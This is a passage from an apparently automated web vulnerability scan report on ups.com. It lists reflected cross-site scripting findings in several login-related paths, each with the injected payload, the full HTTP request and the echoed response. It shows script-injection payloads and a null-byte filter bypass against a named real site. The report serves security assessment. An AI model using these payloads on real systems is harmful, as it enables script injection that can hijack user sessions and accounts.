HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11232







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_b6c8d"><script>alert(1)</script>62dcb8e5408&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_b6c8d%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B62dcb8e5408%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.413. https://www.ups.com/account/us/start [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %004d539</script><script>alert(1)</script>a033567d25f was submitted in the loc parameter. This input was echoed as 4d539</script><script>alert(1)</script>a033567d25f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start?loc=en_US%004d539</script><script>alert(1)</script>a033567d25f&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11332







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_4d539</script><script>alert(1)</script>a033567d25f&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_
...[SNIP]...

1.414. https://www.ups.com/account/us/start [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a5b57'-alert(1)-'baf778aa453 was submitted in the loc parameter. This input was echoed as a5b57'-alert(1)-'baf778aa453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start?loc=en_US%00a5b57'-alert(1)-'baf778aa453&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10656







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
actionUrl = "
...[SNIP]...

1.415. https://www.ups.com/cva [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 33597%0a293e9fe1556 was submitted in the REST URL parameter 1. This input was echoed as 33597
293e9fe1556 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva33597%0a293e9fe1556 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44320

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/cva33597
293e9fe1556?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cva33597
293
...[SNIP]...

1.416. https://www.ups.com/cva [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b82'%3bf7a06e554b0 was submitted in the REST URL parameter 1. This input was echoed as e6b82';f7a06e554b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cvae6b82'%3bf7a06e554b0 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44337

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100
...[SNIP]...

1.417. https://www.ups.com/cva [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/cva

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940e5"%20a%3db%2097335661a92 was submitted in the REST URL parameter 1. This input was echoed as 940e5" a=b 97335661a92 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva940e5"%20a%3db%2097335661a92 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/cva940e5" a=b 97335661a92?appid=CVA">
...[SNIP]...

1.418. https://www.ups.com/cva [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/cva

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001aca2</script><script>alert(1)</script>0fa99372be7 was submitted in the loc parameter. This input was echoed as 1aca2</script><script>alert(1)</script>0fa99372be7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva?loc=en_US%001aca2</script><script>alert(1)</script>0fa99372be7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2</script><script>alert(1)</script>0fa99372be7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2
...[SNIP]...

1.419. https://www.ups.com/cva [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/cva

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0094092'-alert(1)-'0ff48cd0011 was submitted in the loc parameter. This input was echoed as 94092'-alert(1)-'0ff48cd0011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva?loc=en_US%0094092'-alert(1)-'0ff48cd0011&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
d0011&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.420. https://www.ups.com/cva [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/cva

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd6da"><script>alert(1)</script>ed89f360e04 was submitted in the loc parameter. This input was echoed as cd6da"><script>alert(1)</script>ed89f360e04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva?loc=en_US%00cd6da"><script>alert(1)</script>ed89f360e04&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd6da"><script>alert(1)</script>ed89f360e04&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd6da%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bed89f360e04%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.421. https://www.ups.com/myWorkspace/home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed41"%20a%3db%20e2142496064 was submitted in the REST URL parameter 2. This input was echoed as aed41" a=b e2142496064 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homeaed41"%20a%3db%20e2142496064 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/homeaed41" a=b e2142496064">
...[SNIP]...

1.422. https://www.ups.com/myWorkspace/home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload dd611%0a13f21f4da2b was submitted in the REST URL parameter 2. This input was echoed as dd611
13f21f4da2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homedd611%0a13f21f4da2b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611
13f21f4da2b';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611

...[SNIP]...

1.423. https://www.ups.com/myWorkspace/home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9f22'%3b5a005591ca8 was submitted in the REST URL parameter 2. This input was echoed as d9f22';5a005591ca8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homed9f22'%3b5a005591ca8 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44401

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
591ca8';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.424. https://www.ups.com/myWorkspace/home [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myWorkspace/home

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004df24"><script>alert(1)</script>e2b70b6725a was submitted in the loc parameter. This input was echoed as 4df24"><script>alert(1)</script>e2b70b6725a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/home?loc=en_US%004df24"><script>alert(1)</script>e2b70b6725a&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_4df24"><script>alert(1)</script>e2b70b6725a&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_4df24%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be2b70b6725a%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.425. https://www.ups.com/myWorkspace/home [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003b705'-alert(1)-'675be0e7959 was submitted in the loc parameter. This input was echoed as 3b705'-alert(1)-'675be0e7959 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/home?loc=en_US%003b705'-alert(1)-'675be0e7959&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.426. https://www.ups.com/myWorkspace/home [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %007d10a</script><script>alert(1)</script>21c1fea2813 was submitted in the loc parameter. This input was echoed as 7d10a</script><script>alert(1)</script>21c1fea2813 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/home?loc=en_US%007d10a</script><script>alert(1)</script>21c1fea2813&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script><script>alert(1)</script>21c1fea2813';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script>
...[SNIP]...

1.427. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 82b5e%0a3c917cf9f81 was submitted in the REST URL parameter 2. This input was echoed as 82b5e
3c917cf9f81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref82b5e%0a3c917cf9f81 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5e
3c917cf9f81';
